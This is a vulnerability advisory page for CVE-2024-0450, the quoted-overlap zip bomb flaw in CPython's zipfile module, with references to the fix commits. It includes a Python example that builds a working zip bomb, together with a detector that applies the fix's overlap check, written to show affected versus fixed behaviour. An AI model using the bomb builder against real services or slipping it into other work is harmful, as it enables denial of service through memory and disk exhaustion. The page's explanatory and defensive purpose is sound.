PyPi: Python

CVE-2024-0450

Safety vulnerability ID: 66951

This vulnerability was reviewed by experts

The information on this page was manually curated by our Cybersecurity Intelligence Team.

Created at Mar 19, 2024 Updated at Nov 29, 2024

Advisory

An issue was found in the CPython `zipfile` module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to "quoted-overlap" zip bombs, which exploit the zip format to build an archive with a very high compression ratio: the archive carries one compressed payload, and several central directory entries point at local headers that lie inside that payload, so each member decompresses to (almost) the whole payload while the archive itself stays small. The fixed versions of CPython (3.12.2, 3.11.8, 3.10.14, 3.9.19 and 3.8.19) make the zipfile module reject archives in which the compressed data of one entry overlaps another entry: `ZipFile.open()` raises `BadZipFile` ("Overlapped entries") for such a member.
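The advisory describes the quoted-overlap technique and the overlap check only in prose. The program below is an added example written for this page, not code from CPython or from the advisory's authors. It builds a small quoted-overlap archive in memory following the construction from the bamsoftware write-up cited in the references (each member's deflate stream opens with a stored block that "quotes" the next member's local header, so one compressed kernel is shared by every member), checks the archive with the same rule the fix applies in `ZipFile.open()` (a member's compressed data may not run past the next local header or into the central directory), inflates each member directly with `zlib` to show that every member is individually well-formed, and finally calls `ZipFile.read()` so the difference between affected and fixed interpreters is visible. The function names, the member names `0`..`15`, the 1 MiB all-zero kernel and the two-file plain archive used as the negative case are this example's own choices.

```python
import io
import struct
import zipfile
import zlib

# Signatures and struct layouts of the three zip records this example handles.
LFH_SIG, CDH_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
LFH_FMT = "<IHHHHHIIIHH"          # 30-byte local file header
CDH_FMT = "<IHHHHHHIIIHHHHHII"    # 46-byte central directory header
EOCD_FMT = "<IHHHHIIH"            # 22-byte end-of-central-directory record


def _local_header(name: bytes, crc: int, csize: int, usize: int) -> bytes:
    """Local file header: deflate (method 8), no flags, zero timestamp, no extra field."""
    return struct.pack(LFH_FMT, LFH_SIG, 20, 0, 8, 0, 0, crc, csize, usize, len(name), 0) + name


def _stored_block(payload: bytes) -> bytes:
    """One non-final deflate stored block (BFINAL=0, BTYPE=00): 0x00, LEN, NLEN, raw bytes."""
    return b"\x00" + struct.pack("<HH", len(payload), len(payload) ^ 0xFFFF) + payload


def build_quoted_overlap_bomb(n_files: int = 16, kernel_size: int = 1 << 20) -> bytes:
    """Archive of n_files deflated members that all end in one shared compressed kernel.

    Member i's stream starts with a stored block quoting member i+1's local header, so that
    header is data for member i and a valid header for member i+1 at the same time. Member i
    inflates to (the quoted headers after it + kernel_size zero bytes); the kernel is stored once.
    """
    kernel_plain = b"\x00" * kernel_size                    # constructed sample payload
    co = zlib.compressobj(9, zlib.DEFLATED, -15)            # raw deflate, no zlib wrapper
    data, output = co.compress(kernel_plain) + co.flush(), kernel_plain
    names = [str(i).encode() for i in range(n_files)]
    headers = [b""] * n_files
    for i in reversed(range(n_files)):                      # build from the last member backwards
        headers[i] = _local_header(names[i], zlib.crc32(output), len(data), len(output))
        if i:                                               # quote this header into member i-1
            data = _stored_block(headers[i]) + data
            output = headers[i] + output
    body = headers[0] + data                                # every later header sits inside member 0's data
    cd, offset = b"", 0
    for name, lfh in zip(names, headers):
        crc, csize, usize = struct.unpack_from("<III", lfh, 14)
        cd += struct.pack(CDH_FMT, CDH_SIG, 20, 20, 0, 8, 0, 0, crc, csize, usize,
                          len(name), 0, 0, 0, 0, 0, offset) + name
        offset += len(lfh) + 5                              # next header follows the 5-byte stored-block prefix
    eocd = struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, n_files, n_files, len(cd), len(body), 0)
    return body + cd + eocd


def _data_start(zip_bytes: bytes, zi: zipfile.ZipInfo) -> int:
    """Offset of a member's compressed data, taken from its local header, not the central directory."""
    fields = struct.unpack_from(LFH_FMT, zip_bytes, zi.header_offset)
    if fields[0] != LFH_SIG:
        raise zipfile.BadZipFile(f"bad local header for {zi.filename!r}")
    return zi.header_offset + 30 + fields[9] + fields[10]    # + name length + extra length


def find_overlapping_entries(zip_bytes: bytes) -> list[str]:
    """Names whose compressed data runs past the next local header or into the central directory.

    Same rule as the CPython fix. Assumes a single-disk archive with no archive comment and
    no zip64, so the EOCD record is the final 22 bytes of the file.
    """
    if struct.unpack_from("<I", zip_bytes, len(zip_bytes) - 22)[0] != EOCD_SIG:
        raise zipfile.BadZipFile("unexpected end-of-central-directory layout")
    cd_offset = struct.unpack_from("<I", zip_bytes, len(zip_bytes) - 6)[0]
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:      # parsing the directory alone never raises for overlap
        infos = sorted(zf.infolist(), key=lambda zi: zi.header_offset)
    overlapping = []
    for zi, nxt in zip(infos, infos[1:] + [None]):
        limit = nxt.header_offset if nxt else cd_offset
        if _data_start(zip_bytes, zi) + zi.compress_size > limit:
            overlapping.append(zi.filename)
    return overlapping


def decompressed_sizes(zip_bytes: bytes) -> dict[str, int]:
    """Inflate each member's stream directly with zlib and check it against its CRC and size."""
    sizes = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for zi in zf.infolist():
            start = _data_start(zip_bytes, zi)
            raw = zip_bytes[start:start + zi.compress_size]
            plain = zlib.decompress(raw, -15) if zi.compress_type == zipfile.ZIP_DEFLATED else raw
            if zlib.crc32(plain) != zi.CRC or len(plain) != zi.file_size:
                raise zipfile.BadZipFile(f"member {zi.filename!r} does not match its header")
            sizes[zi.filename] = len(plain)
    return sizes


def stdlib_read_outcome(zip_bytes: bytes):
    """Total bytes ZipFile.read() returns over all members, or the BadZipFile message if it refuses."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        try:
            return sum(len(zf.read(zi)) for zi in zf.infolist())
        except zipfile.BadZipFile as exc:
            return f"rejected: {exc}"


def make_plain_zip() -> bytes:
    """Constructed two-member archive without overlap, used as the negative case."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("a.txt", b"hello\n" * 100)
        zf.writestr("b.txt", b"world\n" * 100)
    return buf.getvalue()


if __name__ == "__main__":
    bomb = build_quoted_overlap_bomb()
    print(len(bomb), "bytes on disk,", sum(decompressed_sizes(bomb).values()), "bytes when inflated")
    print("overlapping members:", find_overlapping_entries(bomb))
    print("ZipFile.read():", stdlib_read_outcome(bomb))
```

On 3.12.2, 3.11.8, 3.10.14, 3.9.19, 3.8.19 or later, `stdlib_read_outcome()` returns the "Overlapped entries" message for the bomb; on affected versions it returns the full inflated size, roughly 16 MiB produced from about 2 KB on disk. Two caveats a practitioner should keep in mind: the last member is never flagged, neither by the fix nor by `find_overlapping_entries()`, because its data ends exactly where the central directory begins; and an overlap check catches this one construction only, so it does not replace a cap on total decompressed bytes (and on member count) when extracting untrusted archives.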

Affected package

python

Latest version: 0.9.8

Affected versions

Fixed versions

Vulnerability changelog

An issue was found in the CPython `zipfile` module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to "quoted-overlap" zip bombs, which exploit the zip format to create an archive with a very high compression ratio. The fixed versions of CPython (3.12.2, 3.11.8, 3.10.14, 3.9.19 and 3.8.19) make the zipfile module reject zip archives in which entries overlap. See CVE-2024-0450.


References

CPython issue: https://github.com/python/cpython/issues/109858
Fix commits:
https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85
https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba
https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51
https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549
https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183
https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b
Python security-announce thread: https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/
Quoted-overlap zip bomb technique: https://www.bamsoftware.com/hacks/zipbomb/
Debian LTS, DLA 3771-1 (python2.7), 2024-03-24: https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html
Debian LTS, DLA 3772-1 (python3.7), 2024-03-24: https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html
